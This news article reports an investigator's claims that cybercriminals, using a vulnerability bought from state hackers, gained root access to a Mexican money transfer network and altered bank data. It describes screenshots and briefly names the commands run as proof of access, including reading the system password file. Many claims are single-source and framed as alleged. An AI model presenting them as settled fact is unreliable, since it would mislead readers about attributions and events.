The global banking system has been compromised by cybercriminals who have demonstrated they have high-level access that gives them nearly full control to alter data and steal from banks, according to an expert who has been investigating them on the darknet.
Ed Alexander is a cyberHUMINT (human intelligence) specialist and a subject matter expert on the darknet—private forums run by the hackers. Only accessible with special software, the darknet, in addition to legitimate applications, is used by criminal groups to conspire and sell illicit goods.
In a previous interview, Alexander provided Epoch Times with extensive evidence on the current global bank heist. He previously asked to remain anonymous in order to protect his investigations, but is now going public in order to expose the two groups of hackers who are behind the attacks.
The cyberattacks relate to a string of heists from banks that were recently breached by hackers, including the $81 million stolen from the central bank of Bangladesh. Alexander has provided evidence that these banks are merely the tip of the iceberg, and that the hackers have found a vulnerability that grants them access to thousands of banks around the world and across the United States.
In the previous article, evidence provided by Alexander showed that the cyberattacks began around 2006, when hackers working for the Chinese military acted under state orders to breach critical networks in Mexico. From there, the hackers were able to gain access to the computer systems of a major bank, and then infiltrated a major money transfer network to which the bank—and many other banking institutions—are connected.
The Chinese hackers completed their assignment, and around June 2015 they sold the vulnerability they had exploited to cybercriminals on the darknet. Alexander was able to provide screenshots from posts on a darknet cybercriminal marketplace that was selling access to the Mexican financial networks.
The cybercriminals who purchased the vulnerability from the Chinese hackers are the ones currently carrying out attacks on the global banking system. Alexander provided new evidence showing the cybercriminals have high-level access to the banking networks and that they are using that access to alter data.
Epoch Times spoke with three experts on cybercrime (two on the record, one off the record), who were able to look over the screenshots of the attacks, which had been provided as evidence. In their expert opinions the screenshots are legitimate and their contents support Alexander’s claims.
According to James Scott, senior fellow at the Institute for Critical Infrastructure Technology (ICIT), the screenshots “suggest that an attacker may be exploiting a vulnerability in the system to establish a persistent presence and exfiltrate files.”
“Unless it is patched and the attacker is removed from the system,” Scott said, “the attacker can continue to capitalize from the vulnerability or sell it to other attackers.”
Based on screenshots provided by Alexander, Scott speculated that the cybercriminals may be using their access to the network as a gateway to other money transfer networks or to spoof money transfer requests to additional banks, allowing the hackers to steal money.
Keith Furst, founder of Data Derivatives, a consulting firm focused on financial cybercrime, noted the screenshots show the cybercriminals as having very high-level access on the banking networks. When it comes to banks, he said, only top-level permissions can alter data such as that shown in the screenshots, due to risk that a person could, for example, eliminate his or her debt or illegally transfer money.
“If they can change information at this level, it implies they have access to other information,” Furst said.
An Inside Look
The following are screenshots provided to Epoch Times by Alexander, which he said show cybercriminals actively accessing and altering data on networks belonging to UniTeller, a money transfer network owned by Banorte, Mexico’s third-largest bank.
He added red-colored notes on the screenshots to show the timing of the attacks align with the current attacks on the global banks.
The above screenshot allegedly shows the cybercriminals stealing data from a banking network. Alexander said it shows them running a command in a remote host outside the security domain of the bank, and suggests the hackers accessed the data without having direct login credentials to the network.
The vulnerability also lets the hackers send commands to the servers remotely. “Remote code execution allowed the attackers to run any command on the system,” Alexander said. “It also facilitated upload of other malicious files, which provided greater, more permanent access.”
He noted the screenshot merely captures a single moment in the attack. He said after the hackers ran the command that displayed the data shown in the screenshot, they ran another command that allowed them to tamper with the files and steal data from the system.
The above screenshot was the result of the cybercriminals trying to prove they could manipulate back-end database systems on the banking network, which allows them, according to Alexander, “to effectively change credit limits on various card types.”
By changing the limits on the credit cards, the cybercriminals would be able to steal large amounts of money through fraudulent credit card transactions.
“The important thing here is that the attackers had access to the back-end databases and could easily manipulate, change, or destroy the data records and settings of UniTeller at will,” he said.
He said the screenshot was taken on May 26, but noted the March 2 timestamp suggests the cybercriminals could have been altering the system for close to three months.
Alexander said the above screenshot was the result of the cybercriminals showing proof of the time, date, and level of access they had gained to the banking system.
He noted that “along with the date, there was a screenshot returned of the system name string (uname -a command), its IP configuration data (ifconfig command) and a copy of the local password file to that particular server (/etc/passwd).”
The above screenshot shows the cybercriminals with “root” (administrative) access to the banking server. It also shows files and directories, which the cybercriminals were allegedly modifying when the screenshot was taken.
“Additionally, it is important to remember again, that the vulnerability being used here was run outside UniTeller’s security domain,” Alexander said. “Thus, the attackers were remotely executing code on that server, as they claimed.”
The above screenshot shows a directory and file structure, which Alexander said was provided by the cybercriminals to show they were able to move between directories.
The cybercriminals were interested in this particular directory, he said, since they claimed it allowed them to access a U.S. bank that UniTeller has a relationship with.
He said this screenshot was also important, since the cybercriminals had previously demonstrated “that they had full credentials to UniTeller’s systems and services and had the ability to change them at will.”
He also states that this is only a snapshot in time of a significant cybercrime that is currently in process.